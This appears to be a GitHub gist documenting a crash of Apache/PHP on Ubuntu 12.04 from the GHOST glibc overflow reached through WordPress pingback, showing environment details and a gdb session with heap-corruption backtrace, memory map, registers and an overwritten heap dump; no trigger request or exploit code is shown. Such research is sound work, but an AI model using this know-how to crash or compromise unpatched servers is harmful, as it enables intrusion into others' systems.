Skip to content

Instantly share code, notes, and snippets.

@inaz2

inaz2/env.txt

Last active August 29, 2015 14:15
Show Gist options
  • Save inaz2/ef13a24e1c821da1e5a4 to your computer and use it in GitHub Desktop.
Save inaz2/ef13a24e1c821da1e5a4 to your computer and use it in GitHub Desktop.
Download ZIP
WordPress pingback + GHOST vulnerability
Raw
env.txt
# lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 12.04.5 LTS
Release: 12.04
Codename: precise
# /lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Ubuntu EGLIBC 2.15-0ubuntu10.6) stable release version 2.15, by Roland McGrath et al.
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 4.6.3.
Compiled on a Linux 3.2.60 system on 2014-07-29.
Available extensions:
crypt add-on version 2.1 by Michael Glad and others
GNU Libidn by Simon Josefsson
Native POSIX Threads Library by Ulrich Drepper et al
BIND-8.2.3-T5B
libc ABIs: UNIQUE IFUNC
For bug reporting instructions, please see:
<http://www.debian.org/Bugs/>.
Raw
gdb.txt
# gdb -q apache2
Reading symbols from /usr/sbin/apache2...(no debugging symbols found)...done.
gdb-peda$ run -X
warning: no loadable sections found in added symbol-file system-supplied DSO at 0x7ffff7ffa000
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
[New Thread 0x7ffff0fde700 (LWP 7901)]
[Thread 0x7ffff0fde700 (LWP 7901) exited]
*** glibc detected *** /usr/sbin/apache2: malloc(): memory corruption: 0x0000555556e0cb50 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x7ec66)[0x7ffff71e2c66]
/lib/x86_64-linux-gnu/libc.so.6(+0x80e2b)[0x7ffff71e4e2b]
/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x75)[0x7ffff71e70b5]
/lib/x86_64-linux-gnu/libpcre.so.3(pcre_compile2+0x639)[0x7ffff7ba7ad9]
/usr/lib/apache2/modules/libphp5.so(pcre_get_compiled_regex_cache+0x229)[0x7ffff4142409]
/usr/lib/apache2/modules/libphp5.so(+0xfd35a)[0x7ffff414335a]
/usr/lib/apache2/modules/libphp5.so(+0x39902d)[0x7ffff43df02d]
/usr/lib/apache2/modules/libphp5.so(execute+0x1fb)[0x7ffff438fb9b]
/usr/lib/apache2/modules/libphp5.so(zend_execute_scripts+0x130)[0x7ffff436b100]
/usr/lib/apache2/modules/libphp5.so(php_execute_script+0x1d3)[0x7ffff4317773]
/usr/lib/apache2/modules/libphp5.so(+0x3b460d)[0x7ffff43fa60d]
/usr/sbin/apache2(ap_run_handler+0x48)[0x555555595658]
/usr/sbin/apache2(ap_invoke_handler+0xce)[0x555555595ace]
/usr/sbin/apache2(ap_process_request+0x1a0)[0x5555555a5700]
/usr/sbin/apache2(+0x4e528)[0x5555555a2528]
/usr/sbin/apache2(ap_run_process_connection+0x48)[0x55555559c0f8]
/usr/sbin/apache2(+0x56360)[0x5555555aa360]
/usr/sbin/apache2(+0x56a86)[0x5555555aaa86]
/usr/sbin/apache2(ap_mpm_run+0x5d3)[0x5555555ab253]
/usr/sbin/apache2(main+0xc84)[0x555555580524]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xed)[0x7ffff718578d]
/usr/sbin/apache2(+0x2c5d9)[0x5555555805d9]
======= Memory map: ========
555555554000-5555555bf000 r-xp 00000000 fc:00 657491 /usr/lib/apache2/mpm-prefork/apache2
5555557be000-5555557c2000 r--p 0006a000 fc:00 657491 /usr/lib/apache2/mpm-prefork/apache2
5555557c2000-5555557c5000 rw-p 0006e000 fc:00 657491 /usr/lib/apache2/mpm-prefork/apache2
5555557c5000-555557704000 rw-p 00000000 00:00 0 [heap]
7fffec000000-7fffec021000 rw-p 00000000 00:00 0
7fffec021000-7ffff0000000 ---p 00000000 00:00 0
7ffff0343000-7ffff05c8000 rw-p 00000000 00:00 0
7ffff05c8000-7ffff05dd000 r-xp 00000000 fc:00 130860 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff05dd000-7ffff07dc000 ---p 00015000 fc:00 130860 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff07dc000-7ffff07dd000 r--p 00014000 fc:00 130860 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff07dd000-7ffff07de000 rw-p 00015000 fc:00 130860 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff07de000-7ffff07df000 ---p 00000000 00:00 0
7ffff07df000-7ffff0fdf000 rw-p 00000000 00:00 0
7ffff0fdf000-7ffff0fe6000 r-xp 00000000 fc:00 793084 /usr/lib/php5/20090626/pdo_mysql.so
7ffff0fe6000-7ffff11e5000 ---p 00007000 fc:00 793084 /usr/lib/php5/20090626/pdo_mysql.so
7ffff11e5000-7ffff11e6000 r--p 00006000 fc:00 793084 /usr/lib/php5/20090626/pdo_mysql.so
7ffff11e6000-7ffff11e7000 rw-p 00007000 fc:00 793084 /usr/lib/php5/20090626/pdo_mysql.so
7ffff11e7000-7ffff11fd000 r-xp 00000000 fc:00 793081 /usr/lib/php5/20090626/pdo.so
7ffff11fd000-7ffff13fd000 ---p 00016000 fc:00 793081 /usr/lib/php5/20090626/pdo.so
7ffff13fd000-7ffff1400000 r--p 00016000 fc:00 793081 /usr/lib/php5/20090626/pdo.so
7ffff1400000-7ffff1401000 rw-p 00019000 fc:00 793081 /usr/lib/php5/20090626/pdo.so
7ffff1401000-7ffff141d000 r-xp 00000000 fc:00 793083 /usr/lib/php5/20090626/mysqli.so
7ffff141d000-7ffff161d000 ---p 0001c000 fc:00 793083 /usr/lib/php5/20090626/mysqli.so
7ffff161d000-7ffff1622000 r--p 0001c000 fc:00 793083 /usr/lib/php5/20090626/mysqli.so
7ffff1622000-7ffff1623000 rw-p 00021000 fc:00 793083 /usr/lib/php5/20090626/mysqli.so
7ffff1623000-7ffff18e2000 r-xp 00000000 fc:00 273256 /usr/lib/x86_64-linux-gnu/libmysqlclient.so.18.0.0
7ffff18e2000-7ffff1ae2000 ---p 002bf000 fc:00 273256 /usr/lib/x86_64-linux-gnu/libmysqlclient.so.18.0.0
7ffff1ae2000-7ffff1ae8000 r--p 002bf000 fc:00 273256 /usr/lib/x86_64-linux-gnu/libmysqlclient.so.18.0.0
7ffff1ae8000-7ffff1b66000 rw-p 002c5000 fc:00 273256 /usr/lib/x86_64-linux-gnu/libmysqlclient.so.18.0.0
7ffff1b66000-7ffff1b6b000 rw-p 00000000 00:00 0
7ffff1b6f000-7ffff1b7a000 r-xp 00000000 fc:00 793085 /usr/lib/php5/20090626/mysql.so
7ffff1b7a000-7ffff1d7a000 ---p 0000b000 fc:00 793085 /usr/lib/php5/20090626/mysql.so
7ffff1d7a000-7ffff1d7c000 r--p 0000b000 fc:00 793085 /usr/lib/php5/20090626/mysql.so
7ffff1d7c000-7ffff1d7d000 rw-p 0000d000 fc:00 793085 /usr/lib/php5/20090626/mysql.so
7ffff1d7d000-7ffff1dcc000 rw-p 00000000 00:00 0
7ffff1dcc000-7ffff1dd8000 r-xp 00000000 fc:00 130833 /lib/x86_64-linux-gnu/libnss_files-2.15.so
7ffff1dd8000-7ffff1fd7000 ---p 0000c000 fc:00 130833 /lib/x86_64-linux-gnu/libnss_files-2.15.so
7ffff1fd7000-7ffff1fd8000 r--p 0000b000 fc:00 130833 /lib/x86_64-linux-gnu/libnss_files-2.15.so
7ffff1fd8000-7ffff1fd9000 rw-p 0000c000 fc:00 130833 /lib/x86_64-linux-gnu/libnss_files-2.15.so
7ffff1fd9000-7ffff1fe3000 r-xp 00000000 fc:00 130852 /lib/x86_64-linux-gnu/libnss_nis-2.15.so
7ffff1fe3000-7ffff21e3000 ---p 0000a000 fc:00 130852 /lib/x86_64-linux-gnu/libnss_nis-2.15.so
7ffff21e3000-7ffff21e4000 r--p 0000a000 fc:00 130852 /lib/x86_64-linux-gnu/libnss_nis-2.15.so
7ffff21e4000-7ffff21e5000 rw-p 0000b000 fc:00 130852 /lib/x86_64-linux-gnu/libnss_nis-2.15.so
7ffff21e5000-7ffff21fc000 r-xp 00000000 fc:00 130854 /lib/x86_64-linux-gnu/libnsl-2.15.so
7ffff21fc000-7ffff23fb000 ---p 00017000 fc:00 130854 /lib/x86_64-linux-gnu/libnsl-2.15.so
7ffff23fb000-7ffff23fc000 r--p 00016000 fc:00 130854 /lib/x86_64-linux-gnu/libnsl-2.15.so
7ffff23fc000-7ffff23fd000 rw-p 00017000 fc:00 130854 /lib/x86_64-linux-gnu/libnsl-2.15.so
7ffff23fd000-7ffff23ff000 rw-p 00000000 00:00 0
7ffff23ff000-7ffff2407000 r-xp 00000000 fc:00 130855 /lib/x86_64-linux-gnu/libnss_compat-2.15.so
7ffff2407000-7ffff2606000 ---p 00008000 fc:00 130855 /lib/x86_64-linux-gnu/libnss_compat-2.15.so
7ffff2606000-7ffff2607000 r--p 00007000 fc:00 130855 /lib/x86_64-linux-gnu/libnss_compat-2.15.so
7ffff2607000-7ffff2608000 rw-p 00008000 fc:00 130855 /lib/x86_64-linux-gnu/libnss_compat-2.15.so
7ffff2608000-7ffff260c000 r-xp 00000000 fc:00 657469 /usr/lib/apache2/modules/mod_status.so
7ffff260c000-7ffff280c000 ---p 00004000 fc:00 657469 /usr/lib/apache2/modules/mod_status.so
7ffff280c000-7ffff280d000 r--p 00004000 fc:00 657469 /usr/lib/apache2/modules/mod_status.so
7ffff280d000-7ffff280e000 rw-p 00005000 fc:00 657469 /usr/lib/apache2/modules/mod_status.so
7ffff280e000-7ffff2810000 r-xp 00000000 fc:00 657423 /usr/lib/apache2/modules/mod_setenvif.so
7ffff2810000-7ffff2a10000 ---p 00002000 fc:00 657423 /usr/lib/apache2/modules/mod_setenvif.so
7ffff2a10000-7ffff2a11000 r--p 00002000 fc:00 657423 /usr/lib/apache2/modules/mod_setenvif.so
7ffff2a11000-7ffff2a12000 rw-p 00003000 fc:00 657423 /usr/lib/apache2/modules/mod_setenvif.so
7ffff2a12000-7ffff2a15000 r-xp 00000000 fc:00 657450 /usr/lib/apache2/modules/mod_reqtimeout.so
7ffff2a15000-7ffff2c14000 ---p 00003000 fc:00 657450 /usr/lib/apache2/modules/mod_reqtimeout.so
7ffff2c14000-7ffff2c15000 r--p 00002000 fc:00 657450 /usr/lib/apache2/modules/mod_reqtimeout.so
7ffff2c15000-7ffff2c16000 rw-p 00003000 fc:00 657450 /usr/lib/apache2/modules/mod_reqtimeout.so
7ffff2c16000-7ffff2d67000 r-xp 00000000 fc:00 271674 /usr/lib/x86_64-linux-gnu/libxml2.so.2.7.8
7ffff2d67000-7ffff2f67000 ---p 00151000 fc:00 271674 /usr/lib/x86_64-linux-gnu/libxml2.so.2.7.8
7ffff2f67000-7ffff2f6f000 r--p 00151000 fc:00 271674 /usr/lib/x86_64-linux-gnu/libxml2.so.2.7.8
7ffff2f6f000-7ffff2f71000 rw-p 00159000 fc:00 271674 /usr/lib/x86_64-linux-gnu/libxml2.so.2.7.8
7ffff2f71000-7ffff2f72000 rw-p 00000000 00:00 0
7ffff2f72000-7ffff3123000 r-xp 00000000 fc:00 130887 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7ffff3123000-7ffff3323000 ---p 001b1000 fc:00 130887 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7ffff3323000-7ffff333e000 r--p 001b1000 fc:00 130887 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7ffff333e000-7ffff3349000 rw-p 001cc000 fc:00 130887 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7ffff3349000-7ffff334d000 rw-p 00000000 00:00 0
7ffff334d000-7ffff33a1000 r-xp 00000000 fc:00 130886 /lib/x86_64-linux-gnu/libssl.so.1.0.0
7ffff33a1000-7ffff35a1000 ---p 00054000 fc:00 130886 /lib/x86_64-linux-gnu/libssl.so.1.0.0
7ffff35a1000-7ffff35a4000 r--p 00054000 fc:00 130886 /lib/x86_64-linux-gnu/libssl.so.1.0.0
7ffff35a4000-7ffff35aa000 rw-p 00057000 fc:00 130886 /lib/x86_64-linux-gnu/libssl.so.1.0.0
7ffff35aa000-7ffff35ab000 rw-p 00000000 00:00 0
7ffff35ab000-7ffff36a6000 r-xp 00000000 fc:00 130856 /lib/x86_64-linux-gnu/libm-2.15.so
7ffff36a6000-7ffff38a5000 ---p 000fb000 fc:00 130856 /lib/x86_64-linux-gnu/libm-2.15.so
7ffff38a5000-7ffff38a6000 r--p 000fa000 fc:00 130856 /lib/x86_64-linux-gnu/libm-2.15.so
7ffff38a6000-7ffff38a7000 rw-p 000fb000 fc:00 130856 /lib/x86_64-linux-gnu/libm-2.15.so
7ffff38a7000-7ffff38b6000 r-xp 00000000 fc:00 130821 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7ffff38b6000-7ffff3ab5000 ---p 0000f000 fc:00 130821 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7ffff3ab5000-7ffff3ab6000 r--p 0000e000 fc:00 130821 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7ffff3ab6000-7ffff3ab7000 rw-p 0000f000 fc:00 130821 /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7ffff3ab7000-7ffff3c23000 r-xp 00000000 fc:00 261859 /usr/lib/x86_64-linux-gnu/libdb-5.1.so
7ffff3c23000-7ffff3e23000 ---p 0016c000 fc:00 261859 /usr/lib/x86_64-linux-gnu/libdb-5.1.so
7ffff3e23000-7ffff3e29000 r--p 0016c000 fc:00 261859 /usr/lib/x86_64-linux-gnu/libdb-5.1.so
7ffff3e29000-7ffff3e2a000 rw-p 00172000 fc:00 261859 /usr/lib/x86_64-linux-gnu/libdb-5.1.so
7ffff3e2a000-7ffff3e42000 r-xp 00000000 fc:00 130847 /lib/x86_64-linux-gnu/libresolv-2.15.so
7ffff3e42000-7ffff4042000 ---p 00018000 fc:00 130847 /lib/x86_64-linux-gnu/libresolv-2.15.so
7ffff4042000-7ffff4043000 r--p 00018000 fc:00 130847 /lib/x86_64-linux-gnu/libresolv-2.15.so
7ffff4043000-7ffff4044000 rw-p 00019000 fc:00 130847 /lib/x86_64-linux-gnu/libresolv-2.15.so
7ffff4044000-7ffff4046000 rw-p 00000000 00:00 0
7ffff4046000-7ffff4815000 r-xp 00000000 fc:00 657537 /usr/lib/apache2/modules/libphp5.so
7ffff4815000-7ffff4a14000 ---p 007cf000 fc:00 657537 /usr/lib/apache2/modules/libphp5.so
7ffff4a14000-7ffff4a79000 r--p 007ce000 fc:00 657537 /usr/lib/apache2/modules/libphp5.so
7ffff4a79000-7ffff4a85000 rw-p 00833000 fc:00 657537 /usr/lib/apache2/modules/libphp5.so
7ffff4a85000-7ffff4aa1000 rw-p 00000000 00:00 0
7ffff4aa1000-7ffff4aa8000 r-xp 00000000 fc:00 657451 /usr/lib/apache2/modules/mod_negotiation.so
7ffff4aa8000-7ffff4ca8000 ---p 00007000 fc:00 657451 /usr/lib/apache2/modules/mod_negotiation.so
7ffff4ca8000-7ffff4ca9000 r--p 00007000 fc:00 657451 /usr/lib/apache2/modules/mod_negotiation.so
7ffff4ca9000-7ffff4caa000 rw-p 00008000 fc:00 657451 /usr/lib/apache2/modules/mod_negotiation.so
7ffff4caa000-7ffff4cae000 r-xp 00000000 fc:00 657479 /usr/lib/apache2/modules/mod_mime.so
7ffff4cae000-7ffff4ead000 ---p 00004000 fc:00 657479 /usr/lib/apache2/modules/mod_mime.so
7ffff4ead000-7ffff4eae000 r--p 00003000 fc:00 657479 /usr/lib/apache2/modules/mod_mime.so
7ffff4eae000-7ffff4eaf000 rw-p 00004000 fc:00 657479 /usr/lib/apache2/modules/mod_mime.so
7ffff4eaf000-7ffff4eb1000 r-xp 00000000 fc:00 657468 /usr/lib/apache2/modules/mod_env.so
7ffff4eb1000-7ffff50b0000 ---p 00002000 fc:00 657468 /usr/lib/apache2/modules/mod_env.so
7ffff50b0000-7ffff50b1000 r--p 00001000 fc:00 657468 /usr/lib/apache2/modules/mod_env.so
7ffff50b1000-7ffff50b2000 rw-p 00002000 fc:00 657468 /usr/lib/apache2/modules/mod_env.so
7ffff50b2000-7ffff50b4000 r-xp 00000000 fc:00 657449 /usr/lib/apache2/modules/mod_dir.so
7ffff50b4000-7ffff52b3000 ---p 00002000 fc:00 657449 /usr/lib/apache2/modules/mod_dir.so
7ffff52b3000-7ffff52b4000 r--p 00001000 fc:00 657449 /usr/lib/apache2/modules/mod_dir.so
7ffff52b4000-7ffff52b5000 rw-p 00002000 fc:00 657449 /usr/lib/apache2/modules/mod_dir.so
7ffff52b5000-7ffff52cb000 r-xp 00000000 fc:00 131045 /lib/x86_64-linux-gnu/libz.so.1.2.3.4
7ffff52cb000-7ffff54ca000 ---p 00016000 fc:00 131045 /lib/x86_64-linux-gnu/libz.so.1.2.3.4
7ffff54ca000-7ffff54cb000 r--p 00015000 fc:00 131045 /lib/x86_64-linux-gnu/libz.so.1.2.3.4
7ffff54cb000-7ffff54cc000 rw-p 00016000 fc:00 131045 /lib/x86_64-linux-gnu/libz.so.1.2.3.4
7ffff54cc000-7ffff54d1000 r-xp 00000000 fc:00 657483 /usr/lib/apache2/modules/mod_deflate.so
7ffff54d1000-7ffff56d1000 ---p 00005000 fc:00 657483 /usr/lib/apache2/modules/mod_deflate.so
7ffff56d1000-7ffff56d2000 r--p 00005000 fc:00 657483 /usr/lib/apache2/modules/mod_deflate.so
7ffff56d2000-7ffff56d3000 rw-p 00006000 fc:00 657483 /usr/lib/apache2/modules/mod_deflate.so
7ffff56d3000-7ffff56d8000 r-xp 00000000 fc:00 657443 /usr/lib/apache2/modules/mod_cgi.so
7ffff56d8000-7ffff58d8000 ---p 00005000 fc:00 657443 /usr/lib/apache2/modules/mod_cgi.so
7ffff58d8000-7ffff58d9000 r--p 00005000 fc:00 657443 /usr/lib/apache2/modules/mod_cgi.so
7ffff58d9000-7ffff58da000 rw-p 00006000 fc:00 657443 /usr/lib/apache2/modules/mod_cgi.so
7ffff58da000-7ffff58e2000 r-xp 00000000 fc:00 657475 /usr/lib/apache2/modules/mod_autoindex.so
7ffff58e2000-7ffff5ae1000 ---p 00008000 fc:00 657475 /usr/lib/apache2/modules/mod_autoindex.so
7ffff5ae1000-7ffff5ae2000 r--p 00007000 fc:00 657475 /usr/lib/apache2/modules/mod_autoindex.so
7ffff5ae2000-7ffff5ae3000 rw-p 00008000 fc:00 657475 /usr/lib/apache2/modules/mod_autoindex.so
7ffff5ae3000-7ffff5ae4000 r-xp 00000000 fc:00 657439 /usr/lib/apache2/modules/mod_authz_user.so
7ffff5ae4000-7ffff5ce4000 ---p 00001000 fc:00 657439 /usr/lib/apache2/modules/mod_authz_user.so
7ffff5ce4000-7ffff5ce5000 r--p 00001000 fc:00 657439 /usr/lib/apache2/modules/mod_authz_user.so
7ffff5ce5000-7ffff5ce6000 rw-p 00002000 fc:00 657439 /usr/lib/apache2/modules/mod_authz_user.so
7ffff5ce6000-7ffff5ce8000 r-xp 00000000 fc:00 657458 /usr/lib/apache2/modules/mod_authz_host.so
7ffff5ce8000-7ffff5ee7000 ---p 00002000 fc:00 657458 /usr/lib/apache2/modules/mod_authz_host.so
7ffff5ee7000-7ffff5ee8000 r--p 00001000 fc:00 657458 /usr/lib/apache2/modules/mod_authz_host.so
7ffff5ee8000-7ffff5ee9000 rw-p 00002000 fc:00 657458 /usr/lib/apache2/modules/mod_authz_host.so
7ffff5ee9000-7ffff5eeb000 r-xp 00000000 fc:00 657438 /usr/lib/apache2/modules/mod_authz_groupfile.so
7ffff5eeb000-7ffff60ea000 ---p 00002000 fc:00 657438 /usr/lib/apache2/modules/mod_authz_groupfile.so
7ffff60ea000-7ffff60eb000 r--p 00001000 fc:00 657438 /usr/lib/apache2/modules/mod_authz_groupfile.so
7ffff60eb000-7ffff60ec000 rw-p 00002000 fc:00 657438 /usr/lib/apache2/modules/mod_authz_groupfile.so
7ffff60ec000-7ffff60ed000 r-xp 00000000 fc:00 657433 /usr/lib/apache2/modules/mod_authz_default.so
7ffff60ed000-7ffff62ec000 ---p 00001000 fc:00 657433 /usr/lib/apache2/modules/mod_authz_default.so
7ffff62ec000-7ffff62ed000 r--p 00000000 fc:00 657433 /usr/lib/apache2/modules/mod_authz_default.so
7ffff62ed000-7ffff62ee000 rw-p 00001000 fc:00 657433 /usr/lib/apache2/modules/mod_authz_default.so
7ffff62ee000-7ffff62f0000 r-xp 00000000 fc:00 657459 /usr/lib/apache2/modules/mod_authn_file.so
7ffff62f0000-7ffff64ef000 ---p 00002000 fc:00 657459 /usr/lib/apache2/modules/mod_authn_file.so
7ffff64ef000-7ffff64f0000 r--p 00001000 fc:00 657459 /usr/lib/apache2/modules/mod_authn_file.so
7ffff64f0000-7ffff64f1000 rw-p 00002000 fc:00 657459 /usr/lib/apache2/modules/mod_authn_file.so
7ffff64f1000-7ffff64f3000 r-xp 00000000 fc:00 657457 /usr/lib/apache2/modules/mod_auth_basic.so
7ffff64f3000-7ffff66f2000 ---p 00002000 fc:00 657457 /usr/lib/apache2/modules/mod_auth_basic.so
7ffff66f2000-7ffff66f3000 r--p 00001000 fc:00 657457 /usr/lib/apache2/modules/mod_auth_basic.so
7ffff66f3000-7ffff66f4000 rw-p 00002000 fc:00 657457 /usr/lib/apache2/modules/mod_auth_basic.so
7ffff66f4000-7ffff66f7000 r-xp 00000000 fc:00 657435 /usr/lib/apache2/modules/mod_alias.so
7ffff66f7000-7ffff68f6000 ---p 00003000 fc:00 657435 /usr/lib/apache2/modules/mod_alias.so
7ffff68f6000-7ffff68f7000 r--p 00002000 fc:00 657435 /usr/lib/apache2/modules/mod_alias.so
7ffff68f7000-7ffff68f8000 rw-p 00003000 fc:00 657435 /usr/lib/apache2/modules/mod_alias.so
7ffff68f8000-7ffff68fa000 r-xp 00000000 fc:00 130849 /lib/x86_64-linux-gnu/libdl-2.15.so
7ffff68fa000-7ffff6afa000 ---p 00002000 fc:00 130849 /lib/x86_64-linux-gnu/libdl-2.15.so
7ffff6afa000-7ffff6afb000 r--p 00002000 fc:00 130849 /lib/x86_64-linux-gnu/libdl-2.15.so
7ffff6afb000-7ffff6afc000 rw-p 00003000 fc:00 130849 /lib/x86_64-linux-gnu/libdl-2.15.so
7ffff6afc000-7ffff6b00000 r-xp 00000000 fc:00 130925 /lib/x86_64-linux-gnu/libuuid.so.1.3.0
7ffff6b00000-7ffff6cff000 ---p 00004000 fc:00 130925 /lib/x86_64-linux-gnu/libuuid.so.1.3.0
7ffff6cff000-7ffff6d00000 r--p 00003000 fc:00 130925 /lib/x86_64-linux-gnu/libuuid.so.1.3.0
7ffff6d00000-7ffff6d01000 rw-p 00004000 fc:00 130925 /lib/x86_64-linux-gnu/libuuid.so.1.3.0
7ffff6d01000-7ffff6d28000 r-xp 00000000 fc:00 131048 /lib/x86_64-linux-gnu/libexpat.so.1.5.2
7ffff6d28000-7ffff6f28000 ---p 00027000 fc:00 131048 /lib/x86_64-linux-gnu/libexpat.so.1.5.2
7ffff6f28000-7ffff6f2a000 r--p 00027000 fc:00 131048 /lib/x86_64-linux-gnu/libexpat.so.1.5.2
7ffff6f2a000-7ffff6f2b000 rw-p 00029000 fc:00 131048 /lib/x86_64-linux-gnu/libexpat.so.1.5.2
7ffff6f2b000-7ffff6f34000 r-xp 00000000 fc:00 130845 /lib/x86_64-linux-gnu/libcrypt-2.15.so
7ffff6f34000-7ffff7134000 ---p 00009000 fc:00 130845 /lib/x86_64-linux-gnu/libcrypt-2.15.so
7ffff7134000-7ffff7135000 r--p 00009000 fc:00 130845 /lib/x86_64-linux-gnu/libcrypt-2.15.so
7ffff7135000-7ffff7136000 rw-p 0000a000 fc:00 130845 /lib/x86_64-linux-gnu/libcrypt-2.15.so
7ffff7136000-7ffff7164000 rw-p 00000000 00:00 0
7ffff7164000-7ffff7319000 r-xp 00000000 fc:00 130851 /lib/x86_64-linux-gnu/libc-2.15.so
7ffff7319000-7ffff7519000 ---p 001b5000 fc:00 130851 /lib/x86_64-linux-gnu/libc-2.15.so
7ffff7519000-7ffff751d000 r--p 001b5000 fc:00 130851 /lib/x86_64-linux-gnu/libc-2.15.so
7ffff751d000-7ffff751f000 rw-p 001b9000 fc:00 130851 /lib/x86_64-linux-gnu/libc-2.15.so
7ffff751f000-7ffff7524000 rw-p 00000000 00:00 0
7ffff7524000-7ffff753c000 r-xp 00000000 fc:00 130842 /lib/x86_64-linux-gnu/libpthread-2.15.so
7ffff753c000-7ffff773b000 ---p 00018000 fc:00 130842 /lib/x86_64-linux-gnu/libpthread-2.15.so
7ffff773b000-7ffff773c000 r--p 00017000 fc:00 130842 /lib/x86_64-linux-gnu/libpthread-2.15.so
7ffff773c000-7ffff773d000 rw-p 00018000 fc:00 130842 /lib/x86_64-linux-gnu/libpthread-2.15.so
7ffff773d000-7ffff7741000 rw-p 00000000 00:00 0
7ffff7741000-7ffff7779000 r-xp 00000000 fc:00 267396 /usr/lib/libapr-1.so.0.4.6
7ffff7779000-7ffff7978000 ---p 00038000 fc:00 267396 /usr/lib/libapr-1.so.0.4.6
7ffff7978000-7ffff7979000 r--p 00037000 fc:00 267396 /usr/lib/libapr-1.so.0.4.6
7ffff7979000-7ffff797a000 rw-p 00038000 fc:00 267396 /usr/lib/libapr-1.so.0.4.6
7ffff797a000-7ffff799b000 r-xp 00000000 fc:00 273201 /usr/lib/libaprutil-1.so.0.3.12
7ffff799b000-7ffff7b9b000 ---p 00021000 fc:00 273201 /usr/lib/libaprutil-1.so.0.3.12
7ffff7b9b000-7ffff7b9c000 r--p 00021000 fc:00 273201 /usr/lib/libaprutil-1.so.0.3.12
7ffff7b9c000-7ffff7b9d000 rw-p 00022000 fc:00 273201 /usr/lib/libaprutil-1.so.0.3.12
7ffff7b9d000-7ffff7bd9000 r-xp 00000000 fc:00 130905 /lib/x86_64-linux-gnu/libpcre.so.3.12.1
7ffff7bd9000-7ffff7dd8000 ---p 0003c000 fc:00 130905 /lib/x86_64-linux-gnu/libpcre.so.3.12.1
7ffff7dd8000-7ffff7dd9000 r--p 0003b000 fc:00 130905 /lib/x86_64-linux-gnu/libpcre.so.3.12.1
7ffff7dd9000-7ffff7dda000 rw-p 0003c000 fc:00 130905 /lib/x86_64-linux-gnu/libpcre.so.3.12.1
7ffff7dda000-7ffff7dfc000 r-xp 00000000 fc:00 130843 /lib/x86_64-linux-gnu/ld-2.15.so
7ffff7e20000-7ffff7e2d000 rw-p 00000000 00:00 0
7ffff7e2d000-7ffff7e3f000 rw-s 00000000 00:04 20684 /dev/zero (deleted)
7ffff7e3f000-7ffff7e40000 r--p 00000000 00:00 0
7ffff7e40000-7ffff7ff6000 rw-p 00000000 00:00 0
7ffff7ff6000-7ffff7ffa000 rw-p 00000000 00:00 0
7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso]
7ffff7ffc000-7ffff7ffd000 r--p 00022000 fc:00 130843 /lib/x86_64-linux-gnu/ld-2.15.so
7ffff7ffd000-7ffff7fff000 rw-p 00023000 fc:00 130843 /lib/x86_64-linux-gnu/ld-2.15.so
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
Program received signal SIGABRT, Aborted.
[---------------------------------------------------------------------------------------------registers---------------------------------------------------------------------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0xffffffffffffffff
RDX: 0x6
RSI: 0x1eda
RDI: 0x1eda
RBP: 0x7fffffffa800 --> 0x3
RSP: 0x7fffffff9dc8 --> 0x7ffff719dc5b (<abort+379>: mov rdx,QWORD PTR fs:0x10)
RIP: 0x7ffff719a4f5 (<raise+53>: cmp rax,0xfffffffffffff000)
R8 : 0x0
R9 : 0x555555557448 (add BYTE PTR [rax],al)
R10: 0x8
R11: 0x202
R12: 0x10
R13: 0x5e (^)
R14: 0x7fffffff9f70 --> 0x1
R15: 0xf
[-----------------------------------------------------------------------------------------------code------------------------------------------------------------------------------------------------]
0x7ffff719a4eb <raise+43>: movsxd rdi,eax
0x7ffff719a4ee <raise+46>: mov eax,0xea
0x7ffff719a4f3 <raise+51>: syscall
=> 0x7ffff719a4f5 <raise+53>: cmp rax,0xfffffffffffff000
0x7ffff719a4fb <raise+59>: ja 0x7ffff719a50f <raise+79>
0x7ffff719a4fd <raise+61>: repz ret
0x7ffff719a4ff <raise+63>: nop
0x7ffff719a500 <raise+64>: test eax,eax
[-----------------------------------------------------------------------------------------------stack-----------------------------------------------------------------------------------------------]
00:0000| rsp 0x7fffffff9dc8 --> 0x7ffff719dc5b (<abort+379>: mov rdx,QWORD PTR fs:0x10)
01:0008| 0x7fffffff9dd0 --> 0x3
02:0016| 0x7fffffff9dd8 --> 0x4
03:0024| 0x7fffffff9de0 --> 0x7fffffffe8d7 ("/usr/sbin/apache2")
04:0032| 0x7fffffff9de8 --> 0x11
05:0040| 0x7fffffff9df0 --> 0x7ffff72de657 --> 0x4d54524749530028
06:0048| 0x7fffffff9df8 --> 0x1
07:0056| 0x7fffffff9e00 --> 0x7ffff72df6eb --> 0x78302d0078302b
[---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGABRT
0x00007ffff719a4f5 in raise () from /lib/x86_64-linux-gnu/libc.so.6
gdb-peda$ x/100gx 0x0000555556e0cb50-0x40
0x555556e0cb10: 0x3030303030303030 0x3030303030303030
0x555556e0cb20: 0x3030303030303030 0x3030303030303030
0x555556e0cb30: 0x3030303030303030 0x3030303030303030
